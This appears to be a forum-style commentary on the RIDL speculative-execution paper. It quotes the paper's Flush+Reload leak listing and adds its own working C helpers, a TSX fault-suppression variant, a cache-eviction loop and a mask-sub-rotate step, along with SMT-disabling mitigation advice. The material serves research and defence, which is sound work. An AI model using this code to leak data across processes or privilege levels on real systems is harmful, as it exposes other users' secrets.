There are things pertinent at any level that are omitted. They don't mention how they target a specific process, or even whether that matters in the JS example, though elsewhere they show a filter used to target specific information; in realistic circumstances, even an attacker who got that far is unlikely to recover anything but noise unless they have inside information to use as a reference. They also omit several aspects of each example that are critical to making it a reality. Take the easier example with passwd, which requires no programming knowledge to understand: their technique, while academically interesting (more effective than a dictionary attack, never mind pure brute force), is easily defeated by the same standard denial-of-service and anti-brute-force protections, but they don't mention that.
Figure 2 illustrates the main steps and the underlying mechanism enabling the RIDL leaks. First, as part of its normal execution, the victim code, in another security domain, loads or stores some secret data. Internally, the CPU performs the load or store via some internal buffers, for example, Line Fill Buffers (LFBs). Then, when the attacker also performs a load, the processor speculatively uses in-flight data from the LFBs (with no addressing restrictions) rather than valid data. Finally, by using the speculatively loaded data as an index into a Flush + Reload buffer (or any other covert channel), attackers can extract the secret value.
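To make the victim side of this concrete, here is a minimal sketch (ours, not code from the paper; the function and variable names are hypothetical) of the "victim code in another security domain". The only point is that ordinary loads and stores of the secret are enough to put it in flight through buffers such as the LFBs:

#include <stddef.h>

/* Hypothetical victim running in another process or privilege level. Its
 * ordinary memory traffic is what streams the secret through the CPU's
 * internal buffers (e.g., the line fill buffers); it does nothing on the
 * attacker's behalf. */
void victim_loop(const volatile char *secret, size_t len)
{
    volatile char scratch[64];

    for (;;) {
        /* Any normal access pattern will do: each load/store of the secret
         * makes it transiently visible as in-flight data. */
        for (size_t i = 0; i < len && i < sizeof(scratch); ++i)
            scratch[i] = secret[i];
    }
}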
A simple example of our attack is shown in Listing 1. As shown in the listing, the code is normal, straight-line code without invalid accesses (or, indeed, error suppression), which, as we will show, can also be implemented in managed languages such as JavaScript. Lines 2-3 only flush the buffer that we will later use in our covert channel to leak the secret that we speculatively access in Line 6. Specifically, when executing Line 6, the CPU speculatively loads a value from memory in the hope it is from our newly allocated page, while really it is in-flight data from the LFBs belonging to an arbitrarily different security domain.
 1  /* Flush flush & reload buffer entries. */
 2  for (k = 0; k < 256; ++k)
 3      flush(buffer + k * 1024);
 4
 5  /* Speculatively load the secret. */
 6  char value = *(new_page);
 7  /* Calculate the corresponding entry. */
 8  char *entry_ptr = buffer + (1024 * value);
 9  /* Load that entry into the cache. */
10  *(entry_ptr);
11
12  /* Time the reload of each buffer entry to
13     see which entry is now cached. */
14  for (k = 0; k < 256; ++k) {
15      t0 = cycles();
16      *(buffer + 1024 * k);
17      dt = cycles() - t0;
18
19      if (dt < 100)
20          ++results[k];
21  }
Listing 1: An example of RIDL leaking in-flight data.
When the processor eventually detects the incorrect speculative load, it will discard any and all modifications to registers or memory, and restart execution at Line 6 with the right value. However, since traces of the speculatively executed load still exist at the micro-architectural level (in the form of the corresponding cache line), we can observe the leaked in-flight data using a simple (Flush + Reload) covert channel, no different from that of other speculative execution attacks. In fact, the rest of the code snippet is all about the covert channel. Lines 8-10 speculatively access one of the entries in the buffer, using the leaked in-flight data as an index. As a result, the corresponding cache line will be present. Lines 12-21 then access all the entries in our buffer to see if any of them are significantly faster (indicating that the cache line is present); the index of the fast entry will correspond to the leaked information. Specifically, we may expect two accesses to be fast, not just the one corresponding to the leaked information. After all, when the processor discovers its mistake and restarts at Line 6 with the right value, the program will also access the buffer with this index. Our example above uses demand paging for the loaded address, so the CPU restarts the execution only after handling the page-in event and bringing in a newly mapped page. Note that this is not an error condition, but rather a normal part of the OS' paging functionality.
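Listing 1 leaves flush(), cycles(), and the freshly mapped new_page undefined. The sketch below is our own filling-in for x86-64 Linux using standard compiler intrinsics; the helper names match the listing, map_new_page() is our own name, and the fence placement is one plausible choice rather than the paper's:

#include <stdint.h>
#include <sys/mman.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, _mm_lfence, __rdtscp */

/* Evict one covert-channel entry from the cache (Lines 2-3). */
static inline void flush(void *p)
{
    _mm_clflush(p);
}

/* Serialized timestamp read used to time the reloads (Lines 15-17). */
static inline uint64_t cycles(void)
{
    unsigned int aux;
    _mm_mfence();
    uint64_t t = __rdtscp(&aux);
    _mm_lfence();
    return t;
}

/* A freshly mapped anonymous page: valid, but not yet backed by a physical
 * frame, so the load in Line 6 triggers the page-in event described above
 * (a normal part of demand paging, not an error). */
static char *map_new_page(void)
{
    return mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
}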
We found many other ways to speculatively execute code using in-flight data. In fact, the accessed address is not at all important. As an extreme example, rather than accessing a newly mapped page, Line 6 could even dereference a NULL pointer and later suppress the error (e.g., using TSX). In general, any run-time exception seems to be sufficient to induce RIDL leaks, presumably because the processor can more aggressively speculate on loads in case of exceptions.
https://mdsattacks.com/files/ridl.pdf, pages 4 and 5
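As a rough illustration of the NULL-pointer variant mentioned above, here is our own sketch (not the paper's code): the faulting load is wrapped in a TSX transaction so the exception is suppressed by a transactional abort instead of being delivered. It assumes a CPU with RTM, a compiler flag such as -mrtm, and a caller that passes NULL (or any other invalid address) as invalid_ptr:

#include <immintrin.h>   /* _xbegin, _xend, _XBEGIN_STARTED */

/* Variant of Lines 5-10: dereference an invalid address inside a
 * transaction and let the abort swallow the fault. The transient load
 * still leaves its trace in the cache via the covert-channel access. */
static void leak_via_tsx(volatile char *invalid_ptr, volatile char *buffer)
{
    if (_xbegin() == _XBEGIN_STARTED) {
        unsigned char value = *invalid_ptr;   /* faulting load                 */
        (void)*(buffer + 1024 * value);       /* covert-channel access         */
        _xend();                              /* not reached: the fault aborts */
    }
    /* On abort, execution resumes here; the timing loop of Lines 12-21
     * then recovers the leaked byte as before. */
}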
Synchronization in part B
Conclusion: we can use serialization, contention and eviction to synchronize attacker and victim.
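The notes above only name the three primitives. As one illustration of the eviction-based option (our own sketch, with an assumed last-level cache size and buffer name, not code from the paper): the attacker walks a buffer larger than the LLC so the victim's secret is evicted from the caches, and the victim's next access to it has to stream through the fill buffers at a moment the attacker can anticipate:

#include <stddef.h>

#define ASSUMED_LLC_BYTES (16u * 1024 * 1024)   /* assumption: set per CPU */

/* Touch every cache line of a large buffer (at least 2 * ASSUMED_LLC_BYTES
 * bytes) to push the victim's working set out of the cache hierarchy. The
 * victim's next load of its secret then misses and travels through the
 * line fill buffers, which is the window the load in Listing 1 races. */
static void evict_llc(volatile char *evict_buf)
{
    for (size_t off = 0; off < 2u * ASSUMED_LLC_BYTES; off += 64)
        (void)evict_buf[off];
}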
Cross-process attacks
In a typical real-world setting, synchronizing at the exact point when sensitive data is in-flight becomes non-trivial, as we have limited control over the victim process. Instead, by repeatedly leaking the same information and aligning the leaked bytes, we can retrieve the secret without requiring a hard synchronization primitive. For this purpose, we show a noise-resilient mask-sub-rotate attack technique that leaks 8 bytes from a given index at a time.
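The excerpt only names the primitive; the following is our own guess at the shape of one mask-sub-rotate step (all names and the exact arithmetic are assumptions, not the paper's code). The idea it tries to show is why masking, subtracting the known prefix, and rotating makes repeated noisy leaks of the same data pile up in one histogram bucket:

#include <stdint.h>

/* Assumed reconstruction of one mask-sub-rotate step, run inside the
 * transient window before the covert-channel access. `leaked` is an 8-byte
 * value obtained transiently (as in Line 6 of Listing 1, read as a
 * uint64_t), `known` holds the secret bytes recovered so far, `mask`
 * selects those known bytes plus the next unknown one, and `rot` (1..63)
 * rotates the unknown byte into bits 0..7.
 *
 * If the leaked bytes match the known prefix, the subtraction cancels the
 * prefix and only the unknown byte survives, selecting one consistent
 * Flush + Reload bucket; unrelated in-flight data scatters across buckets,
 * so over many repetitions the true byte dominates the histogram. */
static inline void mask_sub_rotate(uint64_t leaked, uint64_t known,
                                   uint64_t mask, unsigned rot,
                                   volatile char *fr_buffer)
{
    uint64_t v = (leaked & mask) - known;
    v = (v >> rot) | (v << (64 - rot));
    (void)*(fr_buffer + 1024 * (v & 0xff));
}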
In the case of RIDL, the attacker can access any in-flight data currently streaming through internal CPU buffers without performing any check. As a result, address space, privilege, and even enclave boundaries do not represent a restriction for RIDL attacks.
Mitigating RIDL in software. Since sensitive information can be leaked from sibling hardware threads, we strongly recommend disabling SMT to mitigate RIDL.
Worse, it is still possible to leak sensitive information from another privilege level within a single thread (as some of our exploits demonstrated), including information from internal CPU systems such as the MMU.
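On Linux, the kernel exposes SMT state through sysfs; below is a small sketch for checking it (writing "off" to /sys/devices/system/cpu/smt/control as root disables SMT at runtime; the files may be absent on older kernels):

#include <stdio.h>

/* Report whether SMT is currently active using the Linux sysfs interface. */
int main(void)
{
    FILE *f = fopen("/sys/devices/system/cpu/smt/active", "r");
    int active = -1;

    if (f) {
        if (fscanf(f, "%d", &active) != 1)
            active = -1;
        fclose(f);
    }

    if (active == 1)
        puts("SMT is enabled: sibling hardware threads can observe in-flight data.");
    else if (active == 0)
        puts("SMT is disabled.");
    else
        puts("Could not determine SMT state (no sysfs SMT control?).");

    return 0;
}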